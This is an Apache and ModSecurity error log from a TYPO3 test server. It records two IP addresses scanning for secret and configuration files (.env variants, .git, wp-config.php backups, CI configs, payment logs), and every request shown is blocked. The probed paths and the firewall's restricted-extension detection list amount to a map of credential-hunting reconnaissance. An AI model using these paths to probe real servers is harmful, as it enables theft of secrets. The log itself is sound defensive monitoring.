[Fri Dec 05 08:51:09.451298 2025] [:error] [pid 531695] [client 195.178.110.155:53656] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "aTKO7SzhE94da41W-WGH-AAAAH4"]
[Fri Dec 05 08:51:09.451537 2025] [:error] [pid 531695] [client 195.178.110.155:53656] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "aTKO7SzhE94da41W-WGH-AAAAH4"]
[Fri Dec 05 08:51:09.533920 2025] [authz_core:error] [pid 531695] [client 195.178.110.155:53656] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitignore
[Fri Dec 05 08:51:09.556045 2025] [authz_core:error] [pid 531695] [client 195.178.110.155:53656] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Dec 05 08:51:09.578017 2025] [authz_core:error] [pid 531695] [client 195.178.110.155:53656] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Dec 05 08:51:09.651419 2025] [authz_core:error] [pid 531695] [client 195.178.110.155:53656] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Fri Dec 05 08:51:09.673718 2025] [:error] [pid 531695] [client 195.178.110.155:53656] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aTKO7SzhE94da41W-WGH_gAAAH4"]
[Fri Dec 05 08:51:09.673948 2025] [:error] [pid 531695] [client 195.178.110.155:53656] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aTKO7SzhE94da41W-WGH_gAAAH4"]
[Fri Dec 05 08:51:09.674143 2025] [:error] [pid 531695] [client 195.178.110.155:53656] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aTKO7SzhE94da41W-WGH_gAAAH4"]
[Fri Dec 05 08:51:09.764747 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci.yml
[Fri Dec 05 08:51:09.787452 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml
[Fri Dec 05 08:51:09.809146 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Fri Dec 05 08:51:09.831072 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Fri Dec 05 08:51:09.854671 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/azure-pipelines.yml
[Fri Dec 05 08:51:10.031345 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/jenkins.yml
[Fri Dec 05 08:51:10.171801 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Fri Dec 05 08:51:10.193468 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Fri Dec 05 08:51:10.216340 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Fri Dec 05 08:51:10.238446 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Fri Dec 05 08:51:10.260261 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Fri Dec 05 08:51:10.310610 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/debug.log
[Fri Dec 05 08:51:10.333510 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/error.log
[Fri Dec 05 08:51:10.355296 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app.log
[Fri Dec 05 08:51:10.377179 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/stripe.log
[Fri Dec 05 08:51:10.399532 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/payment.log
[Fri Dec 05 08:51:10.542220 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Fri Dec 05 08:51:11.422314 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Dec 05 08:51:11.670015 2025] [authz_core:error] [pid 535957] [client 195.178.110.155:53662] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htaccess
[Fri Dec 05 08:51:11.692172 2025] [:error] [pid 535957] [client 195.178.110.155:53662] [client 195.178.110.155] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aTKO7yytAIKzU33vQQzrlgAAAAk"]
[Fri Dec 05 08:51:11.692301 2025] [:error] [pid 535957] [client 195.178.110.155:53662] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aTKO7yytAIKzU33vQQzrlgAAAAk"]
[Fri Dec 05 08:51:11.692512 2025] [:error] [pid 535957] [client 195.178.110.155:53662] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aTKO7yytAIKzU33vQQzrlgAAAAk"]
[Fri Dec 05 08:51:11.692698 2025] [:error] [pid 535957] [client 195.178.110.155:53662] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aTKO7yytAIKzU33vQQzrlgAAAAk"]
[Fri Dec 05 08:51:13.896001 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aTKO8etJvXQe_RlCiczYNgAAAAA"]
[Fri Dec 05 08:51:13.896242 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aTKO8etJvXQe_RlCiczYNgAAAAA"]
[Fri Dec 05 08:51:13.896436 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aTKO8etJvXQe_RlCiczYNgAAAAA"]
[Fri Dec 05 08:51:13.920634 2025] [authz_core:error] [pid 532216] [client 195.178.110.155:53670] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Fri Dec 05 08:51:13.943391 2025] [authz_core:error] [pid 532216] [client 195.178.110.155:53670] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.bak
[Fri Dec 05 08:51:13.966374 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config.backup"] [unique_id "aTKO8etJvXQe_RlCiczYOQAAAAA"]
[Fri Dec 05 08:51:13.966848 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config.backup"] [unique_id "aTKO8etJvXQe_RlCiczYOQAAAAA"]
[Fri Dec 05 08:51:13.967074 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config.backup"] [unique_id "aTKO8etJvXQe_RlCiczYOQAAAAA"]
[Fri Dec 05 08:51:13.989721 2025] [authz_core:error] [pid 532216] [client 195.178.110.155:53670] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/stripe.bak
[Fri Dec 05 08:51:14.012369 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /node_modules/stripe/package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/stripe/package.json"] [unique_id "aTKO8utJvXQe_RlCiczYOwAAAAA"]
[Fri Dec 05 08:51:14.012605 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/stripe/package.json"] [unique_id "aTKO8utJvXQe_RlCiczYOwAAAAA"]
[Fri Dec 05 08:51:14.012806 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/stripe/package.json"] [unique_id "aTKO8utJvXQe_RlCiczYOwAAAAA"]
[Fri Dec 05 08:51:14.075086 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aTKO8utJvXQe_RlCiczYPQAAAAA"]
[Fri Dec 05 08:51:14.075326 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aTKO8utJvXQe_RlCiczYPQAAAAA"]
[Fri Dec 05 08:51:14.075525 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aTKO8utJvXQe_RlCiczYPQAAAAA"]
[Fri Dec 05 08:51:14.128668 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aTKO8utJvXQe_RlCiczYPgAAAAA"]
[Fri Dec 05 08:51:14.128906 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aTKO8utJvXQe_RlCiczYPgAAAAA"]
[Fri Dec 05 08:51:14.129130 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aTKO8utJvXQe_RlCiczYPgAAAAA"]
[Fri Dec 05 08:51:14.168394 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aTKO8utJvXQe_RlCiczYPwAAAAA"]
[Fri Dec 05 08:51:14.168628 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aTKO8utJvXQe_RlCiczYPwAAAAA"]
[Fri Dec 05 08:51:14.168822 2025] [:error] [pid 532216] [client 195.178.110.155:53670] [client 195.178.110.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aTKO8utJvXQe_RlCiczYPwAAAAA"]
[Fri Dec 05 13:43:38.250174 2025] [authz_core:error] [pid 535952] [client 62.60.131.218:59406] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/*~
[Fri Dec 05 13:43:38.251743 2025] [authz_core:error] [pid 531695] [client 62.60.131.218:64380] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/*.swp
[Fri Dec 05 13:43:38.253272 2025] [:error] [pid 531697] [client 62.60.131.218:60367] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aTLTeuqgQSN2J6Cu49vRXgAAAIA"]
[Fri Dec 05 13:43:38.253447 2025] [:error] [pid 531697] [client 62.60.131.218:60367] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aTLTeuqgQSN2J6Cu49vRXgAAAIA"]
[Fri Dec 05 13:43:38.253486 2025] [:error] [pid 532216] [client 62.60.131.218:59384] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.*"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.*"] [unique_id "aTLTeutJvXQe_RlCiczYVwAAAAA"]
[Fri Dec 05 13:43:38.253646 2025] [:error] [pid 532216] [client 62.60.131.218:59384] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.*"] [unique_id "aTLTeutJvXQe_RlCiczYVwAAAAA"]
[Fri Dec 05 13:43:38.253648 2025] [:error] [pid 531697] [client 62.60.131.218:60367] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.php"] [unique_id "aTLTeuqgQSN2J6Cu49vRXgAAAIA"]
[Fri Dec 05 13:43:38.253807 2025] [:error] [pid 532216] [client 62.60.131.218:59384] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.*"] [unique_id "aTLTeutJvXQe_RlCiczYVwAAAAA"]
